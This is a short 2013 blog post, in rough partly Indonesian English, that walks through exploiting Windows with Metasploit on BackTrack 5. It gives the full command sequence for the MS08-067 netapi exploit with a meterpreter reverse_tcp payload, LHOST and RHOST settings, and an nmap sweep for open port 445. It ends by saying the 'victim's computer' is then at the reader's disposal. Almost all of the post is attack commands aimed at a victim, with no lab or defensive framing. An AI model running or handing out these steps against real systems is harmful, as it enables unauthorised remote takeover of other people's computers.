Wednesday, January 23, 2013

how to exploit windows use backtrack 5


how to exploit windows use backtrack 5

Exploit is a security code that attacked computers specifically. Exploit widely used for penentrasi whether legally or illegally to look for weaknesses (vulnerability) on the destination computer. It could also be said that attacks a vulnerability of software security (security vulnerability) are specific but not always intended to launch an unwanted action. Many researchers used computer security exploit to demonstrate that a system has a fragility. (Wikipedia)
The following are the steps

1. open your console in Backtrack 5
maka akan muncul jendela console
root@bt:~#

2. typing the commandh
root@bt:~# msfconsole
The function syntax to run mestasploit, and wait a moment until the logo appears metasploit

3. Metasploit console will appear
msf > 

4. search netapi
msf > search netapi

5. continue looking netapi windows/smb/ms08_067_netapi windows/smb/ms08_067_netapi
msf> use windows/smb/ms08_067_netapi

6. it will go into netapi
msf> exploit (ms08_067_netapi ) >

7. set payload
msf> exploit (ms08_067_netapi ) > set payload windows/meterpreter/reverse_tcp

8. setting LHOST and RHOST
msf> exploit (ms08_067_netapi ) >set LHOST we-ip
msf> exploit (ms08_067_netapi ) >set RHOST target-ip

9. if it is all right now we just do the nmap port scanner
Open a new console> typing nmap 192.168.0.2/24
192.168.0.2 =ip which we will scan
/24 = subnet

if port 445 is open then it is a gap that we will enter

10. back to your metasploit
now staying execution exploit that we have been setting
msf> exploit (ms08_067_netapi ) > exploit


if successful it will open meterpreter session
meterpreter >


well if it's like this, it is up to you whether the victim's computer



Recent Posts